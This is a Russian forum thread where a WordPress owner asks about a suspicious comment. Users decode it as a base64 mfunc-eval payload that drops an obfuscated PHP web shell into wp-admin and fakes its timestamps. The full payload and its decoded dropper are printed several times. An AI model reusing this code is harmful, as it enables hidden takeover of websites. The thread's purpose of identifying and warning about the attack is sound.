Jump to content

Wordpress комментарии взлом?


Recommended Posts

Приходит вот такой мне код на проверку в комментариях, смотрю, а там множество непонятных букв и большой скрипт. Скажите, что это такие? Вписал, в поисковик, читал разные статьи и нашел, что с помощью этого кода взламывают сайты wordpresse через комментарии, правда ли это?

 

Вот код сам

<!--mfunc eval(base64_decode("IGVycm9yX3JlcG9ydGluZygwKTsgJGZpbGUgPSBkaXJuYW1lKCRfU0VSVkVSWydTQ1JJUFRfRklMRU5BTUUnXSkgLiAnLycgLiAnd3AtYWRtaW4vanF1ZXJ5LnBuZ0ZpeC5taW4ucGhwJzsgJHNyYyA9ICc8P3BocCBldmFsKGd6aW5mbGF0ZShiYXNlNjRfZGVjb2RlKCJEWlpIRHF3SUVrVHYwcXYveFFJb3ZFYTl3SHRYZURZdHZQZWUwMDlkSUpYNUZCa1J4Wm4wZjZxM0djcysyWXMvYWJJVk9QcGZYbVJUWHZ6NVI0aGpZZDA4ZWV0Y0JGcjBwUWpvQVl6Rm1JeW5VWFAxdHdCRGtMSVZwOWt1K2M3R3g1bHlFRitBZkdsNDZobUJKMmRKaGRBb1ljZ29BY2dvRUdDZDcwNE5Ca1poM0pUN1VSdGY5VUxPWTYzb0FOcEdnTGFFeXhhSWpZclVvYkxuRnhyWTBKVUJsS3V0VTd2d2JCYnFNcGhmSElJRUNvS1krNlZ0dWM5ZmFMaGlZb2FhaVJRWi9Qc095dEpNQ3JVeVdDeUlsT05yRFgzU1BTQVk2REJhK3FnZGJRMGhkajl2TzVuRUM4eGZXZnJ4ODdVcHZONzVaZ2Nwc2k1b0RUbE9US2hEV2pWN0tkUWw4RERVZXVPdUxxNFF5VWJMYXh2cnhpK2pBdEk4Y1dhbE5BM21jRGszalVXbmFXRWhqeGErRTV2Y1FLZnZ1UGU5Q09ZTGZkZ0tLT0pDeTBZUWVXWUpnazhBeTRqbEcxOHVQWVJyYkU4a01GeFVsRXlHaUxNTnVaeGZDZXJ5bTlyZXZUTkNsTDZ4MHJPalpzVzdCL094dnVjUUJpT1BLQWdhekZJdjBkSmtsYjI1d1VLNXk2YXlKVkQwOFU1dU5oaGU2UEtXT2hWUXdhbFJQaUIwZTJzYS9hYW1id0dEYzZtYnhINm1pRlR1Vzhjc2xETmllaEsxREZTSitNdThsYWJJZmU1cUZ5M1A5QWpiSkdveE1DLzJCNFhsSmhDd05uZ2g5K2E2dHlsSG5tQWZJTVdONEJhZ1hSMlByM3NKckZRZCtQZTZkdlhMTTBVUkFYSU8wVHlySXgzMkVjMUtSMlNoVUFCR3NsMVBLeG80SHd0Y1RhR1ArUjJtYUducitPTk9pN05DQmFjV1g2SndKTFhIQkI1d21HTmcySzA4dUh2NzRKT2pSRFEvZE1uanJlZWdwK0tSY0EyaTluaWt4RUU2bEpheTVZMGJKN1hNN3NIc1NIWDY4TGJ6ZWdsV3F5TFBLU3FMemNRNHdWcW5LUUlET3VSd1RkdlRMQ09zZ2FoQ0tkN084a2RuZWlTWkFya3VoSUROQ3RLblVzUW9TU2oySXFldDFHRHczcTE4dkdDWk5BbXJTVDlZRjRxVXBwcTBsRlZEZlF6dXR6bU9kQXBYOUs3T0lxckxDT216aS9SOWRUalpYS1BLL0k2Q3RJaVJWOEUvcHg0MlI1MVNhUkxIWlpSNUtUR3NsbkhwR2VUUkt4SlVHRTdMUERaeGl4WU5vaVhxMk9zTTJaaWRpVlZnSGhvb2ZyVXpZdlFEMXNDQnQ4Z0JZUWg4b0pYS3l3SHRUd3hyMkxMcTh0UzhteENDTXhOaDJGbXZZMkoxMGRiMHBXbTBPY09GSDRuOU03QkdYc1VhdDdWNHVBaVpWdmN5Wmw0UjBob0RBY1RtaUllMU9UOXR2c3FwSzBnZ2dIU1ZJeFNISFNqWmZPOUNRcnJxUmo5SDJhWDY0QWx5akQ1eDBnTDJpRUFzUnp6ckxVL2ZicTc4MzVsYTFGVGNZRVl3OGttQTJGYjhxYWVrV0dON2QyUmN5YTE4Y3NNbWxxK09sUUJwTkNGS3lUaWZzQ0dhU2UzMDFDQzZUMnpZY3ZVVUdoUVRQUGxGb1NkWHEwOTdYTUxuS1NWTGM1Qk0rTDNDOG54aC9wWEtDZitBeGFoL3BvKzdkNFFQMlQ2OUd5TExrWWFTOE1ReEIrVCtrMGZDcnd3ZW5XMmhnN2d0ak5HY2c4WkhuZVZ2Zm9Obi9LUUxlWGdDZEh4R1drb3huMXBwVEZmMVZQR1JEUXQwTlhVQTBvcVBoUlNmSk9PaU9aSjRKQXpBZHM2cEdjdGdFZTY2QjUvaWpxQURlV3ZMakh1YTF5bndHVmRFbyttbWNhQU9TSmNrVWpFTElHWk9HbjEyQ21zSWNVVVlWdWpKYXUxbHkyT2JzdGx4UDQzV1NQLzV1S21RV0ZEazBwblZFNmRZaWVtNWVveTJpNmNIOVlSN0sxWmIxV1lOMW5SWWlSNjFReXo1VVdObVVRc3l1OEtXUXNQd1grYjZUVS9WS0FwWGZHRjE3MVhVR2krMHZNME9abGp2QTFRcWkrMTVyZjd5SWVUVnJHU1haM3RlL29kMm04UlQ2TkJ3aWh6NDhGWk9WM3ZnakxwNEsySnEwaDFBb1B3YjI5RUVXSHVXRzBWcTFDNjVxMFFvWnZmUjZObzJTWWNCSUVwQVdlamk4NHI0dEN0UjlxWnNqaTJFdjVhWlhBUFFsYmVDb0UwSGNMK3Q5QklWdzZaZTNaWmtzb1pRaDZDMzRFOVlVWnFBd0FrNDUxb01EQjByZGxBdFJYb29yeG9HZEhQREdRMlg1aEUyYTVza2NWR01MdzdlNHJueDFNL1dmNFd2dlNlMDRVUW00amwxUnFWc2NKSlZ3NDdDUW1HVEF2ZzhxSG5uVFBKZUVaOCtBOTR4bGQ2RkFmeFdRNEpjV2cvTWhVZFBzbE9pM3FuejJwSWNtTTQ2V1N4Sk9QemhjanNBWnpGL000bFc5RzgxeUVNVExmaVppQ2l6NjBjc010cFhGZXVIK0x5Q1V0d1hlWWtWRzl1K1IwcjZabkYyNjNWbnRYL1ZUUURNMWd2djZwMWJ3dUFJSDBpS2hmZCtTS1dEMVkwTmVZaVM2cHM2QlFvUW5wRzd3UlBndzZxV0JLQk9lZHF1YU5UdGsyRjNFZG15ZjBXMnVuTDdSMEpEb05qRlluZ1N4OXJua01rbm82RnJkQXdlWkNhMllmU0hLb0FTMW9PSG5nV1Q3bGlnY29naCtHSVBvYkpLcUdnWGY3Y0R5M0hGdUM0Y2J0VkU4L1FKWGlMRnpFVjhsSHVZV2ViWjZ1aWpnWFQ0UTVuTzExK3NYendqeWxWWUxhQUJKc29sS0pURlVCVTNrQXFveGtiaWRLZGw1VU1KR1ZvZW1VU3NaR0trQkJYNi9TVmgyZWV5c25sb2pMdHY1aGhIS1hGYnord0NnNlkyYjhUd2x0UTNORmYyQ21FbG1qd3gxeWFnWW83YjBWaEg4dlFERHFRSlJacCtTRTl6S0F0Y2w2WXpWS3k0VUxranB5Tk0ySFcrT0dRNUk4Z05RZEphQjU1WDVkS08zd3lZM2QrZVVldmtWU1hBOXkrY0dZK1dpb0JOekZQeUFWS2xydk56bHh1bkh6TFBKeGZ0eEhKSkl3WFlmSnJuelJjUkU0VzF1U2FkM292UjdKdUg3ZGc3YXplQlFYUXRmcm0yaldlVkxVbVNrM25Rei9HWmNTdzF4TkhDNGgwdFhTb1lrbVcrdkxabFNFcGRsVFpTdE5sY1ljZFRHaGljQnZPZ0ZjUERxY0VxN285dm5zbS9saUZkS25DRU04REk4V1hoVXR3SUxvS0ZSRzg1UXRaOWh2b0hKRGZEbUxiYjJ6RXc0WlpvN1RaVHFySTBkR1k1QkpZUFd0T2M1VmdCWnBtc2dQOFpSWmhyNk5zbFJ1aGNuTTdtb2dLcmRacU5JZjcrVUx4NnM1VjZDejFKUktYbHV5ZlIxZ1pkY3RBKzBnTjUzZGtmd1JDTW41ekEzc3NTOU5jc2JqYUsrL2JHZWZ0a2VCeGJjRUFNVWs2WTg2ODdZV1BiOHY0bFNaVWN1THRuUkRjaWpPUEhmK1I2UGs4MWM4bUtYRVBJZ0prcXdvajU2SWlmQ2FiS2VRL0R3dHg1OEh6SU1uK0dtLzZpeEtrQ0Z4R2p3UVdHRmd0aGZzTzBydlJpbXExNEw0QVA0b05VbTQyRS91aU1DYnl5dTF0eE9TeFp0WHdTTlR2TU8xZDFKdXpDSHNWZGp3cjUzNGVrMERGU1NlUVhrbU5WTWhMTk1CMXJyNzlLQ0pJQUFJSWdVWUtYL3U4L2YvLysvZC8vQVE9PSIpKSk7ID8+JzsgJG10aW1lID0gZmlsZW10aW1lKGRpcm5hbWUoJGZpbGUpKTsgJGZoID0gZm9wZW4oJGZpbGUsICd3Jyk7IGZ3cml0ZSgkZmgsICRzcmMpOyBmY2xvc2UoJGZoKTsgdG91Y2goJGZpbGUsICRtdGltZSwgJG10aW1lKTsgdG91Y2goZGlybmFtZSgkZmlsZSksICRtdGltZSwgJG10aW1lKTsgCg==")); --><!--/mfunc-->
Link to post
Share on other sites

Покупайте криптовалюту безопасно за считанные минуты!

 

Приходит вот такой мне код на проверку в комментариях, смотрю, а там множество непонятных букв и большой скрипт. Скажите, что это такие? Вписал, в поисковик, читал разные статьи и нашел, что с помощью этого кода взламывают сайты wordpresse через комментарии, правда ли это?

 

Вот код сам

<!--mfunc eval(base64_decode("IGVycm9yX3JlcG9ydGluZygwKTsgJGZpbGUgPSBkaXJuYW1lKCRfU0VSVkVSWydTQ1JJUFRfRklMRU5BTUUnXSkgLiAnLycgLiAnd3AtYWRtaW4vanF1ZXJ5LnBuZ0ZpeC5taW4ucGhwJzsgJHNyYyA9ICc8P3BocCBldmFsKGd6aW5mbGF0ZShiYXNlNjRfZGVjb2RlKCJEWlpIRHF3SUVrVHYwcXYveFFJb3ZFYTl3SHRYZURZdHZQZWUwMDlkSUpYNUZCa1J4Wm4wZjZxM0djcysyWXMvYWJJVk9QcGZYbVJUWHZ6NVI0aGpZZDA4ZWV0Y0JGcjBwUWpvQVl6Rm1JeW5VWFAxdHdCRGtMSVZwOWt1K2M3R3g1bHlFRitBZkdsNDZobUJKMmRKaGRBb1ljZ29BY2dvRUdDZDcwNE5Ca1poM0pUN1VSdGY5VUxPWTYzb0FOcEdnTGFFeXhhSWpZclVvYkxuRnhyWTBKVUJsS3V0VTd2d2JCYnFNcGhmSElJRUNvS1krNlZ0dWM5ZmFMaGlZb2FhaVJRWi9Qc095dEpNQ3JVeVdDeUlsT05yRFgzU1BTQVk2REJhK3FnZGJRMGhkajl2TzVuRUM4eGZXZnJ4ODdVcHZONzVaZ2Nwc2k1b0RUbE9US2hEV2pWN0tkUWw4RERVZXVPdUxxNFF5VWJMYXh2cnhpK2pBdEk4Y1dhbE5BM21jRGszalVXbmFXRWhqeGErRTV2Y1FLZnZ1UGU5Q09ZTGZkZ0tLT0pDeTBZUWVXWUpnazhBeTRqbEcxOHVQWVJyYkU4a01GeFVsRXlHaUxNTnVaeGZDZXJ5bTlyZXZUTkNsTDZ4MHJPalpzVzdCL094dnVjUUJpT1BLQWdhekZJdjBkSmtsYjI1d1VLNXk2YXlKVkQwOFU1dU5oaGU2UEtXT2hWUXdhbFJQaUIwZTJzYS9hYW1id0dEYzZtYnhINm1pRlR1Vzhjc2xETmllaEsxREZTSitNdThsYWJJZmU1cUZ5M1A5QWpiSkdveE1DLzJCNFhsSmhDd05uZ2g5K2E2dHlsSG5tQWZJTVdONEJhZ1hSMlByM3NKckZRZCtQZTZkdlhMTTBVUkFYSU8wVHlySXgzMkVjMUtSMlNoVUFCR3NsMVBLeG80SHd0Y1RhR1ArUjJtYUducitPTk9pN05DQmFjV1g2SndKTFhIQkI1d21HTmcySzA4dUh2NzRKT2pSRFEvZE1uanJlZWdwK0tSY0EyaTluaWt4RUU2bEpheTVZMGJKN1hNN3NIc1NIWDY4TGJ6ZWdsV3F5TFBLU3FMemNRNHdWcW5LUUlET3VSd1RkdlRMQ09zZ2FoQ0tkN084a2RuZWlTWkFya3VoSUROQ3RLblVzUW9TU2oySXFldDFHRHczcTE4dkdDWk5BbXJTVDlZRjRxVXBwcTBsRlZEZlF6dXR6bU9kQXBYOUs3T0lxckxDT216aS9SOWRUalpYS1BLL0k2Q3RJaVJWOEUvcHg0MlI1MVNhUkxIWlpSNUtUR3NsbkhwR2VUUkt4SlVHRTdMUERaeGl4WU5vaVhxMk9zTTJaaWRpVlZnSGhvb2ZyVXpZdlFEMXNDQnQ4Z0JZUWg4b0pYS3l3SHRUd3hyMkxMcTh0UzhteENDTXhOaDJGbXZZMkoxMGRiMHBXbTBPY09GSDRuOU03QkdYc1VhdDdWNHVBaVpWdmN5Wmw0UjBob0RBY1RtaUllMU9UOXR2c3FwSzBnZ2dIU1ZJeFNISFNqWmZPOUNRcnJxUmo5SDJhWDY0QWx5akQ1eDBnTDJpRUFzUnp6ckxVL2ZicTc4MzVsYTFGVGNZRVl3OGttQTJGYjhxYWVrV0dON2QyUmN5YTE4Y3NNbWxxK09sUUJwTkNGS3lUaWZzQ0dhU2UzMDFDQzZUMnpZY3ZVVUdoUVRQUGxGb1NkWHEwOTdYTUxuS1NWTGM1Qk0rTDNDOG54aC9wWEtDZitBeGFoL3BvKzdkNFFQMlQ2OUd5TExrWWFTOE1ReEIrVCtrMGZDcnd3ZW5XMmhnN2d0ak5HY2c4WkhuZVZ2Zm9Obi9LUUxlWGdDZEh4R1drb3huMXBwVEZmMVZQR1JEUXQwTlhVQTBvcVBoUlNmSk9PaU9aSjRKQXpBZHM2cEdjdGdFZTY2QjUvaWpxQURlV3ZMakh1YTF5bndHVmRFbyttbWNhQU9TSmNrVWpFTElHWk9HbjEyQ21zSWNVVVlWdWpKYXUxbHkyT2JzdGx4UDQzV1NQLzV1S21RV0ZEazBwblZFNmRZaWVtNWVveTJpNmNIOVlSN0sxWmIxV1lOMW5SWWlSNjFReXo1VVdObVVRc3l1OEtXUXNQd1grYjZUVS9WS0FwWGZHRjE3MVhVR2krMHZNME9abGp2QTFRcWkrMTVyZjd5SWVUVnJHU1haM3RlL29kMm04UlQ2TkJ3aWh6NDhGWk9WM3ZnakxwNEsySnEwaDFBb1B3YjI5RUVXSHVXRzBWcTFDNjVxMFFvWnZmUjZObzJTWWNCSUVwQVdlamk4NHI0dEN0UjlxWnNqaTJFdjVhWlhBUFFsYmVDb0UwSGNMK3Q5QklWdzZaZTNaWmtzb1pRaDZDMzRFOVlVWnFBd0FrNDUxb01EQjByZGxBdFJYb29yeG9HZEhQREdRMlg1aEUyYTVza2NWR01MdzdlNHJueDFNL1dmNFd2dlNlMDRVUW00amwxUnFWc2NKSlZ3NDdDUW1HVEF2ZzhxSG5uVFBKZUVaOCtBOTR4bGQ2RkFmeFdRNEpjV2cvTWhVZFBzbE9pM3FuejJwSWNtTTQ2V1N4Sk9QemhjanNBWnpGL000bFc5RzgxeUVNVExmaVppQ2l6NjBjc010cFhGZXVIK0x5Q1V0d1hlWWtWRzl1K1IwcjZabkYyNjNWbnRYL1ZUUURNMWd2djZwMWJ3dUFJSDBpS2hmZCtTS1dEMVkwTmVZaVM2cHM2QlFvUW5wRzd3UlBndzZxV0JLQk9lZHF1YU5UdGsyRjNFZG15ZjBXMnVuTDdSMEpEb05qRlluZ1N4OXJua01rbm82RnJkQXdlWkNhMllmU0hLb0FTMW9PSG5nV1Q3bGlnY29naCtHSVBvYkpLcUdnWGY3Y0R5M0hGdUM0Y2J0VkU4L1FKWGlMRnpFVjhsSHVZV2ViWjZ1aWpnWFQ0UTVuTzExK3NYendqeWxWWUxhQUJKc29sS0pURlVCVTNrQXFveGtiaWRLZGw1VU1KR1ZvZW1VU3NaR0trQkJYNi9TVmgyZWV5c25sb2pMdHY1aGhIS1hGYnord0NnNlkyYjhUd2x0UTNORmYyQ21FbG1qd3gxeWFnWW83YjBWaEg4dlFERHFRSlJacCtTRTl6S0F0Y2w2WXpWS3k0VUxranB5Tk0ySFcrT0dRNUk4Z05RZEphQjU1WDVkS08zd3lZM2QrZVVldmtWU1hBOXkrY0dZK1dpb0JOekZQeUFWS2xydk56bHh1bkh6TFBKeGZ0eEhKSkl3WFlmSnJuelJjUkU0VzF1U2FkM292UjdKdUg3ZGc3YXplQlFYUXRmcm0yaldlVkxVbVNrM25Rei9HWmNTdzF4TkhDNGgwdFhTb1lrbVcrdkxabFNFcGRsVFpTdE5sY1ljZFRHaGljQnZPZ0ZjUERxY0VxN285dm5zbS9saUZkS25DRU04REk4V1hoVXR3SUxvS0ZSRzg1UXRaOWh2b0hKRGZEbUxiYjJ6RXc0WlpvN1RaVHFySTBkR1k1QkpZUFd0T2M1VmdCWnBtc2dQOFpSWmhyNk5zbFJ1aGNuTTdtb2dLcmRacU5JZjcrVUx4NnM1VjZDejFKUktYbHV5ZlIxZ1pkY3RBKzBnTjUzZGtmd1JDTW41ekEzc3NTOU5jc2JqYUsrL2JHZWZ0a2VCeGJjRUFNVWs2WTg2ODdZV1BiOHY0bFNaVWN1THRuUkRjaWpPUEhmK1I2UGs4MWM4bUtYRVBJZ0prcXdvajU2SWlmQ2FiS2VRL0R3dHg1OEh6SU1uK0dtLzZpeEtrQ0Z4R2p3UVdHRmd0aGZzTzBydlJpbXExNEw0QVA0b05VbTQyRS91aU1DYnl5dTF0eE9TeFp0WHdTTlR2TU8xZDFKdXpDSHNWZGp3cjUzNGVrMERGU1NlUVhrbU5WTWhMTk1CMXJyNzlLQ0pJQUFJSWdVWUtYL3U4L2YvLysvZC8vQVE9PSIpKSk7ID8+JzsgJG10aW1lID0gZmlsZW10aW1lKGRpcm5hbWUoJGZpbGUpKTsgJGZoID0gZm9wZW4oJGZpbGUsICd3Jyk7IGZ3cml0ZSgkZmgsICRzcmMpOyBmY2xvc2UoJGZoKTsgdG91Y2goJGZpbGUsICRtdGltZSwgJG10aW1lKTsgdG91Y2goZGlybmFtZSgkZmlsZSksICRtdGltZSwgJG10aW1lKTsgCg==")); --><!--/mfunc-->

Это закодированый файл, зашел на онлайн декодер, и вот что он мне показал:

 error_reporting(0); $file = dirname($_SERVER['SCRIPT_FILENAME']) . '/' . 'wp-admin/jquery.pngFix.min.php'; $src = '<?php eval(gzinflate(base64_decode("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"))); ?>'; $mtime = filemtime(dirname($file)); $fh = fopen($file, 'w'); fwrite($fh, $src); fclose($fh); touch($file, $mtime, $mtime); touch(dirname($file), $mtime, $mtime);

 

А судя по некоторым строчкам, код помоему реально хотел открыть доступ к вашей админ панели, тем самым взломать ваш сайт

 

PS^ Весь я думаю переводить не стоит, хотя если хотите, пишите в ЛС

Edited by MazaFacker
Link to post
Share on other sites
Guest werstey

Это web shell если кому то удастся залить его вам тогда у него будет полный доступ к вашему акк. на сервере. Вообще вп их не хавает, но может быть уже придумали что то новое, или бывает админ вп отдает все права пользователю по незнанию и тогда web shell залить можно как по маслу  

Link to post
Share on other sites

Это закодированый файл, зашел на онлайн декодер, и вот что он мне показал:

 error_reporting(0); $file = dirname($_SERVER['SCRIPT_FILENAME']) . '/' . 'wp-admin/jquery.pngFix.min.php'; $src = '<?php eval(gzinflate(base64_decode("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